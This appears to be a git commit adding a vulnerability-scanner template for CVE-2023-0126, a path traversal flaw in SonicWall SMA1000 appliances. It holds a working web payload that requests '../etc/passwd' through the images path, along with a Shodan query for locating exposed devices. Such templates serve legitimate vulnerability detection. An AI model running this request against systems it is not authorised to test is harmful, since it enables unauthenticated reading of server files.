Create CVE-2023-0126.yaml
parent
e63d1ec432
commit
f145f75d65
|
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2023-0126
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SonicWall SMA1000 LFI
|
||||||
|
author: tess
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-0126
|
||||||
|
- https://github.com/advisories/GHSA-mr28-27qx-phg3
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2023-0126
|
||||||
|
cwe-id: CWE-22
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
shodan-query: title:"Appliance Management Console Login"
|
||||||
|
tags: cve,cve2023,sonicwall,lfi,sma1000
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- content/unknown
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue